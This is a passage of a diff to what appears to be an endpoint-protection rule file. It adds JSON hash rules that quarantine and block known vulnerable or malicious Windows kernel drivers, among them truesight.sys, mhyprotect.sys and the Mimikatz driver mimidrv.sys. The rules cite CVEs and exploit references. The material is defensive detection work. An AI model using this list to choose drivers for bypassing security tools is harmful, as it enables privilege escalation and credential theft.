+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d6d3e514-c6a8-5eed-9c09-6cdb5c956e24",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156938Z",
+ "creation_date": "2026-03-23T11:45:31.156940Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156952Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e507b8b6b9fd0275e858d721ba6dd3ce7864a9f4822e97c0cc5338facece8305",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d6db1ed1-9f82-52da-961c-d220a7cedc40",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499667Z",
+ "creation_date": "2026-03-23T11:45:31.499670Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499679Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "71760362ea4f35cd3fc3b4a3a002f4f5e04f83b20efa81c4b865543ed00240ad",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d6db3855-2fa1-53ed-b829-cacde9330ec3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622892Z",
+ "creation_date": "2026-03-23T11:45:29.622893Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622899Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "38fa9b5b66a11fd7387012c5c4bbd414eca8361273d57dba1e49aa6af23337f3",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d6dc7499-f4d1-565f-93b0-d8496a6e3331",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818719Z",
+ "creation_date": "2026-03-23T11:45:30.818721Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818726Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4c80a2d3a0ef4ce0a3aec62e9d15b50679dec4cccb69a5c0b72529641ebfa5f4",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d6de2e19-8305-5310-b303-bc676760fc01",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472230Z",
+ "creation_date": "2026-03-23T11:45:31.472234Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472242Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "85a626153de212444496be7c28c61a0a49b672d88de0f3de4794558ec3613d5d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d6e429ba-60b2-5eec-9cfd-b3c4f6b95a0a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816862Z",
+ "creation_date": "2026-03-23T11:45:31.816865Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816890Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0baee4e0bf0c33bab6bba5fb6a644f67a53e58fe66fb98d17a229e39d8a01931",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d6e6e0db-492a-5a99-8903-c31c61f6c3ec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468824Z",
+ "creation_date": "2026-03-23T11:45:30.468827Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468834Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "35d552d7603a26ea7ed111bd865cddaf7aa342481c89af7b2697beb25b99e829",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d6ea952e-ec86-5186-988c-0c30d24a8a23",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830580Z",
+ "creation_date": "2026-03-23T11:45:30.830582Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830588Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a9181974503438d60ceac451fe075011f5167ea835a77b650a654b4e34f16497",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d701418c-9f92-5c43-9a27-15015c453755",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459244Z",
+ "creation_date": "2026-03-23T11:45:30.459247Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459256Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8017e618b5a7aa608cc4bce16e4defd6b4e99138c4ba1bdd6ad78e39f035cf59",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d70f5fa2-c778-54dc-8814-d6becc0157ec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808761Z",
+ "creation_date": "2026-03-23T11:45:31.808763Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808769Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d2e8a4753abb0176692e89baf9607cc58b6d498a3fb2d4da095ab4a41a793702",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d715e8e2-2a88-52a0-a50a-06f9cb894618",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813034Z",
+ "creation_date": "2026-03-23T11:45:31.813037Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813045Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "839790b1272d3e7f8315b01b3dd41501cf6b12cab5688dc65c0dea98b5a116d0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d7220389-1b3a-507d-8ed7-06bc5c3f4ac4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144782Z",
+ "creation_date": "2026-03-23T11:45:32.144784Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144790Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5aded75d6beb315849f698a78f8033de26eb151955a1cbc01e3037320e2a0eb6",
+ "comment": "Malicious Kernel Driver (aka windivert.sys) [https://www.loldrivers.io/drivers/45a31a17-f78d-48ec-beba-74f6bfc5f96e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d7455733-b796-59b0-9c5d-398e34a5a3a5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821619Z",
+ "creation_date": "2026-03-23T11:45:31.821621Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821627Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0bcf09a59e2deb358e822f635df4a866721ea739a68e1225ea0aa029abfd6bdf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d747e1e9-d3b4-5c37-946b-5b55047e41a0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611728Z",
+ "creation_date": "2026-03-23T11:45:29.611730Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611735Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "991228f3ea6c1ae8083aa405d1d066e48cd6dbd7d6bc01c81599b2c28f3923f1",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d7482fcb-4d34-51d3-a979-a42fdbaeaaa0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980464Z",
+ "creation_date": "2026-03-23T11:45:29.980466Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980472Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "982ad43111d8b7a7900df652c8873eeb6aa485bb429dee6c2ad44acf598bb5e6",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d75ed853-499a-53bc-adb6-6a12ba145202",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476852Z",
+ "creation_date": "2026-03-23T11:45:31.476856Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476866Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a32f9b83a80e09b28163c70af0d0ffff7acc7f7b63ddc3286c589bc741e41cf6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d766b573-7b05-5f68-a092-5ebf08e3ac88",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486396Z",
+ "creation_date": "2026-03-23T11:45:31.486399Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486406Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8210184d342da90354402e53fa09d6ba0173c3305c41072fd6a2ce79b0524a53",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d76b90ba-6963-5e2c-b282-8885f3b25b6f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461724Z",
+ "creation_date": "2026-03-23T11:45:30.461728Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461736Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "edeb35e4341034b2de389017c4884b081a821f34349a620897a2a845c84cb09e",
+ "comment": "Vulnerable Kernel Driver (aka mhyprotect.sys) [https://www.loldrivers.io/drivers/7abc873d-9c28-44c2-8f60-701a8e26af29/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d7766e4a-08d0-5e7c-8a14-30db3a3dadc8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818754Z",
+ "creation_date": "2026-03-23T11:45:30.818756Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818762Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8f69fa6128acbaa8217454ff22eb7fb9be1e841ed47116e7616749600b4bfc4d",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d780e75f-cab3-5af0-81c7-18889b59dee3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815253Z",
+ "creation_date": "2026-03-23T11:45:31.815255Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815261Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fad7be43548a35c9916a1765b6388710989f2d283cc60f8783a77651a97149cf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d784f743-22d8-5d02-ad40-28cd9e5d36dc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975166Z",
+ "creation_date": "2026-03-23T11:45:29.975168Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975174Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f6cd7353cb6e86e98d387473ed6340f9b44241867508e209e944f548b9db1d5f",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d79a7bdc-344c-5733-9af1-bb58feaf0277",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.810812Z",
+ "creation_date": "2026-03-23T11:45:31.810814Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.810820Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ceaa5af4b5d113dd319a7bc2d59c46853f39bc0ee0fe0b20e6a37c3afdfcd4a8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d7a133c1-5746-560e-b10f-2b16f5af3787",
+ "test_maturity_current_count": 0,
